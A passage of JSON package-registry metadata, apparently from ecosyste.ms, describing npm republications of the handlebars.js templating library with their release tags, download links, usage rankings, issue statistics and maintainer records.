osts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2024-09-27T04:43:54.914Z","dependent_packages_count":0,"downloads":35,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":31.36235491620597,"dependent_repos_count":37.49662796984681,"dependent_packages_count":53.96848874002429,"stargazers_count":0.7580795741905088,"forks_count":0.8799163753869983,"docker_downloads_count":null,"average":24.893093515130918},"purl":"pkg:npm/handlebars-jaylinski","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/handlebars-jaylinski","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/handlebars-jaylinski","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/handlebars-jaylinski/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2024-09-21T02:22:56.531Z","issues_count":143,"pull_requests_count":96,"avg_time_to_close_issue":22941441.18811881,"avg_time_to_close_pull_request":15945824.09375,"issues_closed_count":101,"pull_requests_closed_count":64,"pull_request_authors_count":33,"issue_authors_count":112,"avg_comments_per_issue":3.4895104895104896,"avg_comments_per_pull_request":1.78125,"merged_pull_requests_count":42,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":19,"past_year_pull_requests_count":10,"past_year_avg_time_to_close_issue":148792.55555555556,"past_year_avg_time_to_close_pull_request":6178825.6,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":5,"past_year_pull_request_authors_count":8,"past_year_issue_authors_count":17,"past_year_avg_comments_per_issue":1.631578947368421,"past_year_avg_comments_per_pull_request":2.4,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[{"login":"jaylinski","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski/codemeta","maintainers":[{"uuid":"jaylinski","login":"jaylinski","name":null,"email":"jakob.linskeseder@gmail.com","url":null,"packages_count":7,"html_url":"https://www.npmjs.com/~jaylinski","role":null,"created_at":"2023-07-27T23:33:41.584Z","updated_at":"2023-07-27T23:33:41.584Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/jaylinski/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5678686,"maintainers_count":1211412,"namespaces_count":399623,"keywords_count":847874,"github":"npm","metadata":{"funded_packages_count":171745},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-06-10T05:11:46.456Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5134814,"name":"@web3-storage/handlebars","ecosystem":"npm","description":"Handlebars provides the power necessary to let you build semantic templates effectively with no frustration","homepage":"https://www.handlebarsjs.com/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":["handlebars","mustache","template","html"],"namespace":"web3-storage","versions_count":1,"first_release_published_at":"2022-08-04T16:54:07.624Z","latest_release_published_at":"2022-08-04T16:54:07.624Z","latest_release_number":"1.0.0","last_synced_at":"2026-07-19T22:22:29.604Z","created_at":"2022-08-06T00:28:02.499Z","updated_at":"2026-07-19T22:22:29.604Z","registry_url":"https://www.npmjs.com/package/@web3-storage/handlebars","install_command":"npm install @web3-storage/handlebars","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.0.0"}},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2024-09-03T20:27:37.000Z","size":4058,"stargazers_count":17990,"open_issues_count":94,"forks_count":2042,"subscribers_count":451,"default_branch":"master","last_synced_at":"2024-10-29T20:37:55.598Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.markdown","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2024-10-29T10:55:41.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"704e5df2-5b6b-4f79-8e30-c8540825a30e","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":89,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222119788,"owners_count":16934949,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:44:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms